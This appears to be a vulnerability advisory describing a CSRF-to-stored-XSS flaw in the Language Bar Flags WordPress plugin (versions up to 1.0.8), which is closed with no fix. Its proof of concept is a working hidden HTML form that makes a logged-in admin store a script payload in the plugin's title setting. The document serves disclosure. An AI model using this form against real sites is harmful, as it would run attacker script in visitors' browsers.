Language Bar Flags <= 1.0.8 - CSRF to Stored XSS
Description
The plugin does not have any CSRF in place when saving its settings and did not sanitise or escape them when generating the flag bar in the frontend. This could allow attackers to make a logged in admin change the settings, and set Cross-Site Scripting payload in them, which will be executed in the frontend for all users
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=langbf" method="POST">
<input type="hidden" name="options_update" value="1" />
<input type="hidden" name="langbf_active" value="yes" />
<input type="hidden" name="langbf_title" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="langbf_position" value="top" />
<input type="hidden" name="langbf_side" value="left" />
<input type="hidden" name="langbf_disable_wpbar" value="yes" />
<input type="hidden" name="langbf_new_window" value="no" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Then view the homepage of the blog to trigger the XSS
Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Vinay Bhuria
Submitter
Vinay Bhuria
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-08-16 (about 3 months ago)
Added
2021-08-16 (about 3 months ago)
Last Updated
2021-08-16 (about 3 months ago)